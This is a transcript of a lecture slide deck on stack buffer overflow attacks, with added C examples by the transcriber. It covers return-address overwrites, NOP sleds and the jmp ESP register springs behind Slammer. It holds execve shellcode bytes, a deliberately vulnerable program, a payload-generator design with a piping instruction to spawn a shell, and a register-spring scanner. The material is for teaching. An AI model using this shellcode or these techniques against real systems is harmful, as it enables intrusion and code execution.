ch5 buffer overflow concept

Upload: good2000mo

Post on 30-May-2018

TRANSCRIPT

  • 8/9/2019 Ch5 Buffer Overflow Concept

    1/69

    Buffer Overflow

    Attack Concept

2/69

Outline

Background
Basic Concept
Attack Flow
NOP technique
Attack Example: Slammer

3/69

Essential attack method

Try a web search for "buffer overflow exploit".
Check alt.2600, rootshell.com, antionline.com: you can find long lists of exploits based on buffer overflow.
Even the original version of ssh had a problem! (after they made a big deal that there were no buffer overflow problems in their code).

4/69

The Problem

void foo(char *s) {
    char buf[10];
    strcpy(buf, s);            /* no length check: anything longer than 9 bytes overflows buf */
    printf("buf is %s\n", s);
}

foo("thisstringistolongforfoo");

5/69

Exploitation

The general idea is to give programs (servers) very large strings that will overflow a buffer.
For a server with sloppy code it's easy to crash the server by overflowing a buffer (SEGV, typically).
It's sometimes possible to actually make the server do whatever you want (instead of crashing).

6/69

Buffer Overflow

Some unsafe functions in the C library (no verification of the destination size):

strcpy(char *dest, const char *src);
strcat(char *dest, const char *src);
getwd(char *buf);
gets(char *s);
fscanf(FILE *stream, const char *format, ...);
scanf(const char *format, ...);
realpath(char *path, char resolved_path[]);
sprintf(char *str, const char *format, ...);
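An added example (mine, not code from the slides): the foo() of slide 4 with the same 10-byte buffer, but with the copy bounded, next to a gets() replacement that reports an over-long line instead of overflowing. The helper names bounded_copy, foo_checked and read_line_checked are my own; the point is that the caller learns the input was rejected, which strncpy() alone (which may leave the buffer unterminated and says nothing) does not give you.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() in tests on glibc */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 10

/* Copy src into dst (capacity cap bytes, terminator included).
 * Returns 0 on success and -1, leaving dst empty, if src does not fit.
 * Always NUL-terminates and never silently truncates. */
int bounded_copy(char *dst, size_t cap, const char *src) {
    size_t n = strlen(src);
    if (cap == 0) return -1;
    if (n >= cap) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Hardened foo(): same 10-byte stack buffer as on slide 4, but an over-long
 * argument is reported instead of overwriting whatever sits above buf. */
int foo_checked(const char *s) {
    char buf[BUF_SIZE];
    if (bounded_copy(buf, sizeof buf, s) != 0) {
        fprintf(stderr, "foo: %zu-byte input rejected (max %zu)\n",
                strlen(s), sizeof buf - 1);
        return -1;
    }
    printf("buf is %s\n", buf);
    return 0;
}

/* gets() replacement: read one line into dst (capacity cap), strip the
 * newline. Returns 1 for a complete line, 0 at end of input, -1 if the line
 * did not fit; in that case the rest of the line is discarded so the next
 * call starts on a fresh line instead of re-reading the tail as new input. */
int read_line_checked(FILE *in, char *dst, size_t cap) {
    if (fgets(dst, (int)cap, in) == NULL) return 0;
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[n - 1] = '\0';
        return 1;
    }
    if (n == cap - 1) {                 /* buffer filled without a newline */
        int c = fgetc(in);
        if (c == '\n' || c == EOF) return 1;   /* line was exactly cap-1 chars */
        while ((c = fgetc(in)) != EOF && c != '\n') { }
        return -1;
    }
    return 1;                           /* last line of input, no newline */
}

int main(void) {
    foo_checked("short");                     /* accepted */
    foo_checked("thisstringistolongforfoo");  /* rejected, stack intact */
    return 0;
}
```

Pipe the over-long input from slide 4 into either function and it is refused; the vulnerable version would have written 15 bytes past the end of buf.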

7/69

Background Necessary

C functions and the stack.
A little knowledge of assembly/machine language.
How system calls are made (at the level of machine code).
The exec() system calls.
How to guess some key parameters.

8/69

CPU/OS dependency

Building an exploit requires knowledge of the specific CPU and operating system of the target.
I'll just talk about x86 and Linux, but the methods work for other CPUs and OSs.
Some details are very different, but the concepts are the same.

9/69

Outline

Background
Basic Concept
Attack Flow
NOP technique
Attack Example: Slammer

10/69

C Call Stack

When a function call is made, the return address is put on the stack.
Often the values of parameters are put on the stack.
Usually the function saves the stack frame pointer (on the stack).
Local variables are on the stack.

11/69

12/69

Stack

13/69

(figure: one stack frame)

    High addresses
    +----------------------+
    | Arguments            |
    | Return address       |
    | Prev. frame pointer  |
    | Local variables      |  <- Stack Pointer
    +----------------------+
    Low addresses

    Stack Growth: toward low addresses.
    String Growth (a buffer being written): toward high addresses.

14/69

Stack Direction

On Linux (x86) the stack grows from high addresses to low.
Pushing something on the stack moves the Top Of Stack towards address 0.

15/69

A Stack Frame (figure)

    SP+offset -> Parameters
                 Return Address
                 Calling Frame Pointer
    SP        -> Local Variables

    Addresses decrease toward 00000000 (downward in the picture).

16/69

Sample Stack

void foo(int j) {
    int x, y;
    char buf[100];
    x = j;
}

Caller:
    x = 2;
    foo(18);
    y = 3;

Stack while foo runs (high to low; the order of the locals is whatever the compiler chose, the slide draws y, x, buf):

    18                      argument j
    address of "y=3"        return address
    saved stack pointer     caller's frame pointer
    y
    x
    buf

17/69

Smashing the Stack*

The general idea is to overflow a buffer so that it overwrites the return address.
When the function is done it will jump to whatever address is on the stack.
We put some code in the buffer and set the return address to point to it!

18/69

Before and After

void foo(char *s) {
    char buf[100];
    strcpy(buf, s);
}

Before strcpy (high to low):       After strcpy:
    address of s                       address of s
    return-address                     pointer to pgm   (now points into buf)
    saved sp                           (overwritten on the way up)
    buf                                Small Program    (the code carried in s)

19/69

(the stack frame figure from slide 13, repeated)

20/69

bar() { }
foo() { call bar(); }

(figure: the stack frame diagram from slide 13 drawn twice, foo's frame above bar's; bar's frame, at the lower addresses, holds the return address back into foo, and the Stack Pointer sits at its bottom)

21/69

int bar(int a, int b) {
    int i, j;
    char buf[9];
    i = 5;
    j = 123;
    strcpy(buf, "securephdbcde");   /* 13 characters plus the NUL: 14 bytes into a 9-byte buffer */
}

Buffer Overflow: bar's frame after the strcpy (high addresses at the top, one 4-byte row per line, bytes listed in increasing-address order):

    b
    a
    ret address
    SFP
    05 00 00 00     i = 5, untouched
    65 00 00 00     j was 123 (7b 00 00 00); "e" and the terminating NUL overwrote its two lowest bytes
    64 62 63 64     "d b c d": "d" is buf[8], the last byte of buf; "b c d" land in the alignment padding after it
    72 65 70 68     "r e p h"   buf[4..7]
    73 65 63 75     "s e c u"   buf[0..3], the lowest address

22/69

int bar(int a, int b) {
    int i, j;
    char buf[9];
    i = 5;
    j = 123;
    strcpy(buf, "securephdaaabbbbccccddddeeeeffff");   /* 32 characters plus the NUL */
}

Ret Overflow: bar's frame after the strcpy (high addresses at the top):

    b
    a               66 66 66 66     "ffff"
    ret address     65 65 65 65     "eeee"
    SFP             64 64 64 64     "dddd"
    i (was 5)       63 63 63 63     "cccc"
    j (was 123)     62 62 62 62     "bbbb"
    buf[8..11]      64 61 61 61     "d a a a"
    buf[4..7]       72 65 70 68     "r e p h"
    buf[0..3]       73 65 63 75     "s e c u"

When bar returns: Segmentation fault... RetAddr = 0x65656565 ("eeee"), which is not a mapped code address.
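An added example (mine, not from the slides) that models bar()'s frame from slides 21 and 22 as a byte array and applies the same unchecked copy, so the value each input leaves in j, i, the saved frame pointer and the return address is computed rather than read off the picture. The slot offsets (9-byte buf padded to 12, then j, i, SFP, ret, a, b), the placeholder saved-EBP and return-address constants, little-endian byte order and the function names are assumptions that follow the slide's drawing, not guarantees of any compiler. The second input is the 32-character string whose hex rows the slide shows ("securephd", then aaa, bbbb, cccc, dddd, eeee, ffff).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Offsets inside bar()'s frame as drawn on the slide, lowest address first.
 * buf[9] is padded to 12 bytes so the ints after it stay 4-byte aligned.
 * These offsets are an assumption matching the picture, not a C guarantee. */
enum {
    OFF_BUF = 0, OFF_J = 12, OFF_I = 16, OFF_SFP = 20,
    OFF_RET = 24, OFF_A = 28, OFF_B = 32, FRAME_SIZE = 36
};

struct frame_view { uint32_t j, i, sfp, ret, a, b; };

/* x86 stores multi-byte values little-endian; doing it by hand keeps the
 * model's answers identical on any host. */
static void le32_store(unsigned char *p, uint32_t v) {
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}
static uint32_t le32_load(const unsigned char *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

#define PLACEHOLDER_SFP 0xbffff8c8u   /* made-up saved EBP */
#define PLACEHOLDER_RET 0x080484d2u   /* made-up return address into bar's caller */

/* Lay out bar()'s frame with i = 5, j = 123 and placeholder control data, then
 * do what strcpy(buf, s) does: copy every byte of s plus the NUL, no bound
 * check. Fills *out and returns 0; returns -1 if s would run off the end of
 * the modelled frame (a real process would just keep writing up the stack). */
int overflow_frame(const char *s, struct frame_view *out) {
    unsigned char frame[FRAME_SIZE];
    size_t n = strlen(s) + 1;
    if (n > FRAME_SIZE) return -1;
    memset(frame, 0, sizeof frame);
    le32_store(frame + OFF_J, 123);
    le32_store(frame + OFF_I, 5);
    le32_store(frame + OFF_SFP, PLACEHOLDER_SFP);
    le32_store(frame + OFF_RET, PLACEHOLDER_RET);
    le32_store(frame + OFF_A, 1);
    le32_store(frame + OFF_B, 2);
    memcpy(frame + OFF_BUF, s, n);                 /* the unchecked copy */
    out->j   = le32_load(frame + OFF_J);
    out->i   = le32_load(frame + OFF_I);
    out->sfp = le32_load(frame + OFF_SFP);
    out->ret = le32_load(frame + OFF_RET);
    out->a   = le32_load(frame + OFF_A);
    out->b   = le32_load(frame + OFF_B);
    return 0;
}

/* Inverse problem: the string that makes bar() return to `target`. Fills
 * buf, j, i and SFP with `filler` and writes target little-endian where the
 * return address lives. Returns the length written, or 0 if target contains
 * a zero byte, because strcpy() would stop there and never reach the rest. */
size_t build_ret_overwrite(uint32_t target, char filler, char *out, size_t cap) {
    unsigned char t[4];
    le32_store(t, target);
    if (cap < OFF_RET + 4 + 1) return 0;
    for (int k = 0; k < 4; k++) if (t[k] == 0) return 0;
    memset(out, filler, OFF_RET);
    memcpy(out + OFF_RET, t, 4);
    out[OFF_RET + 4] = '\0';
    return OFF_RET + 4;
}

int main(void) {
    struct frame_view v;
    char payload[FRAME_SIZE];
    overflow_frame("securephdbcde", &v);
    printf("slide 21: j=0x%08x i=0x%08x ret=0x%08x\n", v.j, v.i, v.ret);
    overflow_frame("securephdaaabbbbccccddddeeeeffff", &v);
    printf("slide 22: sfp=0x%08x ret=0x%08x\n", v.sfp, v.ret);
    if (build_ret_overwrite(0x41424344u, 'A', payload, sizeof payload)) {
        overflow_frame(payload, &v);
        printf("crafted:  ret=0x%08x\n", v.ret);
    }
    return 0;
}
```

The model reproduces the slide: the 13-character string leaves j = 0x65 (the "e" and the NUL over the low bytes of 123) and touches nothing above it; the 32-character string puts 0x65656565 in the return address. build_ret_overwrite refusing 0x08048500 shows why text-segment addresses with a zero byte are awkward targets for strcpy()-driven overflows.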

23/69

(the foo/bar stack figure from slide 20, repeated)

24/69

(the foo/bar stack figure from slide 20, repeated)

25/69

Outline

Background
Basic Concept
Attack Flow
NOP technique
Attack Example: Slammer

26/69

Control Flow Hijack

I want my code executed!
Malicious code injection
Control flow redirection/hijacking

(figure: injected code placed among the program's code; delivered by a Virus or a Worm)

27/69

A Single Packet Exploit

(figure: one packet carrying the Attack Code and the Exploit (ReturnAddr))

Return Address == 0x4739a304

28/69

Issues

How do we know what value the pointer should have (the new return address)?
It's the address of the buffer, but how do we know what address this is?
How do we build the small program and put it in a string?

29/69

Guessing Addresses

Typically you need the source code so you can estimate the address of both the buffer and the return-address.
An estimate is often good enough! (more on this in a bit).

30/69

Building the small program

Typically, the small program stuffed into the buffer does an exec().
Sometimes it changes the password db or other files.

31/69

exec()

In Unix, the way to run a new program is with the exec() system call.
There is actually a family of exec() system calls.
This doesn't create a new process; it changes the current process to a new program.
To create a new process you need something else (fork()).

32/69

exec() example

#include <stdio.h>
#include <unistd.h>

char *args[] = {"/bin/ls", NULL};

void execls(void) {
    execv("/bin/ls", args);
    printf("I'm not printed\n");   /* only reached if execv() fails */
}

33/69

Generating a String

You can take code like the previous slide, and generate machine language.
Copy down the individual byte values and build a string.
To do a simple exec requires less than 100 bytes.

34/69

A Sample Program/String

Does an exec() of /bin/ls:

/* jmp/call trick to get the address of the trailing string into ESI, then
 * execve("/bin/ls", {"/bin/ls", NULL}, NULL) via int 0x80, then exit() */
unsigned char cde[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/ls";

35/69

Some important issues

The small program should be position-independent: able to run at any memory location.
It can't be too large, or we can't fit the program and the new return-address on the stack!

36/69

Sample Overflow Program

#include <stdio.h>

unsigned char cde[] =                 /* the /bin/ls shellcode from slide 34 */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/ls";

void tst(void) {
    int *ret;
    ret = (int *)&ret + 2;   /* pointer arith! assumes a 32-bit frame where ret is the only local,
                                directly below the saved frame pointer and the return address */
    (*ret) = (int)cde;       /* change ret addr */
}

int main(void) {
    printf("Running tst\n");
    tst();
    printf("tst returned\n"); /* never reached if the return address was redirected */
}

37/69

Attacking a real program

Recall that the idea is to feed a server a string that is too big for a buffer.
This string overflows the buffer and overwrites the return address on the stack.
Assuming we put our small program in the string, we need to know its address.

38/69

Outline

Background
Basic Concept
Attack Flow
NOP technique
Attack Example: Slammer

39/69

NOPs

Most CPUs have a No-Operation instruction: it does nothing but advance the instruction pointer.
Usually we can put a bunch of these ahead of our program (in the string).
As long as the new return-address points to a NOP we are OK.

40/69

Example (od -x style dump of the generated string: a run of 0x90 NOPs, the shellcode, here ending in "/bin/sh", then the guessed return address 0xbffff822 repeated, and finally 0xbffffa48):

0000000 9090 9090 9090 9090 9090 9090 9090 9090
*
00001f0 9090 9090 22eb 895e 89f3 83f7 07c7 c031
0000200 89aa 89f9 abf0 fa89 c031 b0ab 0408 cd03
0000210 3180 89db 40d8 80cd d9e8 ffff 2fff 6962
0000220 2f6e 6873 f822 bfff f822 bfff f822 bfff
0000230 f822 bfff f822 bfff f822 bfff f822 bfff
*
00004a0 f822 bfff f822 bfff f822 bfff 9090 9090
00004b0 fa48 bfff

41/69

Example: NOP-sled (the same dump as slide 40)

Sometimes we cannot easily determine the exact memory address to jump into.

42/69

NOP Sled Engineering

(figure: the packet before and after: [Attack Code | Exploit (ReturnAddr)] becomes [NOP NOP ... NOP | Attack Code | Exploit (ReturnAddr)])

And, sometimes, we simply want to find a way to avoid \x00:

code[] = "\xeb\x2a\x5f\xc6\x47\x07\x00\x89\x7f\x08\xc7\x47";
strcpy(buf, code);
/* buf now holds only "\xeb\x2a\x5f\xc6\x47\x07": strcpy() stops at the first \x00 byte */

43/69

Detecting NOP Sleds

Intrusion Prevention Systems or Advanced Firewalls

(figure: an Intrusion Prevention System in front of legacy victims; each packet is analyzed against NOP Sled Signatures and dropped if it matches)

44/69

Attack polymorphism (many different ways)

(figure: the Attack Code / Exploit (ReturnAddr) packet, now preceded by Decryption Code)

The Signature Explosion Problem!!

45/69

A WORM with a NOP-Sled (the dump from slide 40 again)

46/69

NOP sleds

A NOP sled can/will NOT be a useful signature in detecting future WORMs.
80~90% of the WORMs today don't really need NOP sleds but, historically, they are still left there.

47/69

Memory Address Ranges

(figure: two stack frames [Arguments | Return address | Prev. frame pointer | Local variables], the same vulnerable frame at two different addresses)

One exploit has one return address value, but another exploit based on the same vulnerability might be using a different return address.

48/69

Using NOPs

String layout (low to high addresses, as in the dump on slide 40):

    nop instructions
    Real program (exec /bin/ls or whatever)
    new return address

49/69

Estimating the stack size

We can also guess at the location of the return address relative to the overflowed buffer.
Put in a bunch of new return addresses!

50/69

Estimating the Location

(figure: the string from slide 48 with the new return address repeated many times after the real program, so that one of the copies lands on the saved return address wherever it is)

51/69

vulnerable.c

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void foo(char *s) {
    char name[200];
    strcpy(name, s);             /* the overflow: s comes straight from stdin */
    printf("Name is %s\n", name);
}

int main(void) {
    char buf[2000];
    read(0, buf, 2000);          /* note: read() does not NUL-terminate buf */
    foo(buf);
}

52/69

genpgm.c

genpgm.c was constructed to exploit the buffer overflow in vulnerable.c.
It allows the user to add an offset to a fixed guess of the address of the return-address on the stack.
It writes (to stdout) a string that contains a bunch of return-addresses and a program that does: exec /bin/ls.

53/69

Testing

./genpgm 16 | ./vulnerable

Get ambitious! Change the program output by genpgm to exec /bin/sh!

(./genpgm; cat) | ./vulnerable

(the trailing cat keeps stdin open so the spawned shell can read commands)
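An added example (mine; the genpgm.c of the slides is not on the page, so this is not it): a generator for the string layout in the dump on slide 40, a NOP sled, then the code, then the guessed return address repeated, plus a check that any guess landing inside the sled reaches the code, which is what slides 39, 48 and 49 rely on. The shellcode is replaced by a stand-in of int3 bytes so nothing executes; the buffer address, sizes and the names build_payload, land and sled_reaches_code are assumptions for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90              /* x86 one-byte no-op */

/* Stand-in for the shellcode: int3 breakpoints, never executed here.
 * A real generator would put the execve string from slide 34 in its place. */
static const unsigned char CODE_STUB[] = { 0xcc, 0xcc, 0xcc, 0xcc };

struct payload {
    unsigned char bytes[4096];
    size_t len;
    size_t sled_len;          /* bytes 0 .. sled_len-1 are NOPs */
    size_t code_off;          /* offset of the code inside the payload */
};

static void le32_store(unsigned char *p, uint32_t v) {
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}
static uint32_t le32_load(const unsigned char *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Build [sled of NOPs][code][guess repeated ret_copies times], NUL-terminated.
 * The repeated copies cover the saved return address without knowing exactly
 * how far above the buffer it is; the sled gives the guess a sled_len-byte
 * window of valid targets instead of a single address.
 * guess = buf_addr + offset, the offset being what genpgm takes on its
 * command line. Returns 0, or -1 if the guess or the code contains a NUL
 * byte (strcpy() would cut the string there) or the sizes do not fit. */
int build_payload(uint32_t buf_addr, int offset, size_t sled_len, size_t ret_copies,
                  const unsigned char *code, size_t code_len, struct payload *p) {
    uint32_t guess = buf_addr + (uint32_t)offset;
    unsigned char g[4];
    le32_store(g, guess);
    for (int k = 0; k < 4; k++) if (g[k] == 0) return -1;
    if (code_len > 0 && memchr(code, 0, code_len) != NULL) return -1;
    size_t total = sled_len + code_len + 4 * ret_copies;
    if (total + 1 > sizeof p->bytes) return -1;
    memset(p->bytes, NOP, sled_len);
    memcpy(p->bytes + sled_len, code, code_len);
    for (size_t k = 0; k < ret_copies; k++)
        memcpy(p->bytes + sled_len + code_len + 4 * k, g, 4);
    p->bytes[total] = '\0';
    p->len = total;
    p->sled_len = sled_len;
    p->code_off = sled_len;
    return 0;
}

/* Where does execution end up if the CPU starts at `target` while the payload
 * sits at `buf_addr`? Steps over NOPs and returns the address of the first
 * non-NOP byte reached; 0 means target is outside the payload (a crash). */
uint32_t land(const struct payload *p, uint32_t buf_addr, uint32_t target) {
    if (target < buf_addr || target >= buf_addr + p->len) return 0;
    size_t off = target - buf_addr;
    while (off < p->len && p->bytes[off] == NOP) off++;
    return buf_addr + (uint32_t)off;
}

/* Does starting at `target` run into the code through the sled? */
int sled_reaches_code(const struct payload *p, uint32_t buf_addr, uint32_t target) {
    return land(p, buf_addr, target) == buf_addr + (uint32_t)p->code_off;
}

int main(void) {
    struct payload p;
    uint32_t buf_addr = 0xbffff600u;          /* assumed address of the vulnerable buffer */
    if (build_payload(buf_addr, 16, 500, 100, CODE_STUB, sizeof CODE_STUB, &p) != 0) return 1;
    fwrite(p.bytes, 1, p.len, stdout);        /* like genpgm: write it for piping into ./vulnerable */
    return 0;
}
```

With a 500-byte sled any guess between buf_addr and buf_addr+500 reaches the code, which is why an estimate of the buffer address is "often good enough"; a guess that lands in the middle of the code, or below the buffer, still crashes.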

54/69

(figure: an attack packet from the outside in: IP HDR | TCP/UDP HDR | upper-layer payload = [NOP NOP NOP NOP | Decryption Code | Attack Code | Exploit (ReturnAddr)] -> System State Changes)

How can each of the stages be polymorphic?

55/69

DEMONSTRATION OF BUFFER OVERFLOW

http://www.youtube.com/watch?v=ZZ0LVAFIDrA

56/69

Outline

Background
Basic Concept
Attack Flow
NOP technique
Attack Example: Slammer

57/69

Attack technique: jmp ESP

ESP: Stack Pointer. EBP: Stack Base (frame pointer).

Use the ESP register to locate the attack code: right after RET pops the overwritten return address, ESP points at the bytes just above it on the stack, and the overflow wrote those bytes too. If the return address points at a "jmp ESP" instruction somewhere in the process (a fixed address in a loaded module), control lands in the attacker's data without having to guess the stack address at all.

58/69

(figure: the stack frame diagram with the frames of foo and bar; bar's return address is replaced by the address of a "jmp ESP" instruction; remaining figure labels: ret, 11,000)

59/69

Attack flow

Start:
    CALL FunctionWithBufferOverflow

FunctionWithBufferOverflow:
    PUSH EBP
    MOV  EBP, ESP
    CALL OverflowMyBuffer
    POP  EBP
    RET

60/69 - 63/69

The same listing, stepping through the stack (each box is one 32-bit slot; the stack grows toward lower addresses, so later pushes appear below earlier ones):

    after CALL FunctionWithBufferOverflow:   ESP     -> Return address (Start+6)
    after PUSH EBP:                          ESP     -> Old EBP
                                                        Return address (Start+6)
    after MOV EBP,ESP, inside OverflowMyBuffer:
                                             ESP/EBP -> MyBuffer
                                                        Old EBP
                                                        Return address (Start+6)

64/69 - 65/69

OverflowMyBuffer writes past the end of MyBuffer. Numbering the 32-bit slots the overflow fills Attack0 .. Attack8 from low to high addresses:

    Attack0 .. Attack4   MyBuffer itself (ESP/EBP point at its bottom)
    Attack5              Old EBP
    Attack6              Return address
    Attack7, Attack8     the slots above the return address

After POP EBP:  EBP == Attack5.
After RET:      EIP = Attack6 and ESP points at Attack7. If Attack6 holds the address of a "jmp ESP" instruction, execution continues in the attacker's data at Attack7 (code).

66/69

Results

This is how Slammer worked; Sasser is very similar, as are a couple of others.
Bogus return pointer is Attack6, payload starts at Attack7.

67/69

Jump to other registers

EBX: base register for indexing the buffer base.
Code Red II and Blaster (RPC DCOM) used EBX.
The 0xff 0xd3 byte pair quoted here encodes CALL EBX (JMP EBX is 0xff 0xe3); either transfers control to the address in EBX, and the slide reports it at 0x0100139d.
EDI: destination register for string operations.
The ASN.1 exploit uses EDI.
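An added example (mine, not from the slides): a scan of a byte image for the two-byte register springs this slide names, jmp/call ESP and jmp/call EBX, reporting each one's address and skipping any address that contains a zero byte, since a strcpy()-delivered overflow could not carry it. The image, its base address 0x7c801000, the planted offsets and the function names are constructed for the example; nothing here is a real module.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Two-byte register springs: FF /4 is JMP r/m32, FF /2 is CALL r/m32, and
 * the ModRM byte selects the register (ESP = 100b, EBX = 011b). */
struct spring { const char *name; unsigned char op[2]; };
static const struct spring SPRINGS[] = {
    { "jmp esp",  { 0xff, 0xe4 } },
    { "call esp", { 0xff, 0xd4 } },
    { "jmp ebx",  { 0xff, 0xe3 } },
    { "call ebx", { 0xff, 0xd3 } },   /* the 0xff 0xd3 pair quoted on the slide */
};
#define NSPRINGS (sizeof SPRINGS / sizeof SPRINGS[0])

struct hit { uint32_t addr; const char *name; };

/* Does the 32-bit address contain a zero byte? A strcpy()-style copy
 * cannot deliver such an address inside the string. */
int addr_has_nul(uint32_t a) {
    for (int k = 0; k < 4; k++) if (((a >> (8 * k)) & 0xff) == 0) return 1;
    return 0;
}

/* Scan img (loaded at base) for every spring and record the usable hits in
 * address order. Returns the number of hits stored (at most cap); hits whose
 * address has a NUL byte are counted in *skipped instead. */
size_t find_springs(const unsigned char *img, size_t len, uint32_t base,
                    struct hit *out, size_t cap, size_t *skipped) {
    size_t n = 0;
    *skipped = 0;
    for (size_t i = 0; i + 1 < len; i++) {
        for (size_t s = 0; s < NSPRINGS; s++) {
            if (img[i] != SPRINGS[s].op[0] || img[i + 1] != SPRINGS[s].op[1]) continue;
            uint32_t addr = base + (uint32_t)i;
            if (addr_has_nul(addr)) { (*skipped)++; continue; }
            if (n < cap) { out[n].addr = addr; out[n].name = SPRINGS[s].name; }
            n++;
        }
    }
    return n < cap ? n : cap;
}

/* Constructed image for the example: 4 KiB of 0x90 filler with four springs
 * planted at known offsets. Loaded at SAMPLE_BASE (also made up). */
#define SAMPLE_BASE 0x7c801000u
#define SAMPLE_LEN  0x1000
void build_sample_image(unsigned char *img) {
    memset(img, 0x90, SAMPLE_LEN);
    img[0x100] = 0xff; img[0x101] = 0xe4;   /* jmp esp, but its address ends in 0x00 */
    img[0x39d] = 0xff; img[0x39e] = 0xd3;   /* call ebx */
    img[0x7ff] = 0xff; img[0x800] = 0xe4;   /* jmp esp */
    img[0xabc] = 0xff; img[0xabd] = 0xe3;   /* jmp ebx */
}

int main(void) {
    unsigned char img[SAMPLE_LEN];
    struct hit hits[16];
    size_t skipped;
    build_sample_image(img);
    size_t n = find_springs(img, SAMPLE_LEN, SAMPLE_BASE, hits, 16, &skipped);
    for (size_t k = 0; k < n; k++) printf("%-8s at 0x%08x\n", hits[k].name, hits[k].addr);
    printf("%zu usable, %zu skipped (NUL byte in address)\n", n, skipped);
    return 0;
}
```

Any of the reported addresses can stand in for Attack6 on the previous slides: the byte pair does not have to be an intended instruction, only to sit at a fixed address in the victim's image, which is why a module loaded at the same place on every machine made Slammer, Code Red II and Blaster portable.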

68/69

(figure: the foo/bar stack diagram again; bar's return address points at a "jmp ESP" or a "jmp EBX" instruction)

69/69

Register Spring + Polymorphic

(figure: [NOP NOP NOP NOP | Decryption Code | Attack Code | Exploit (Register Spring)] with the return address 0x0100139d; a block marked "????" stands for the part still unknown)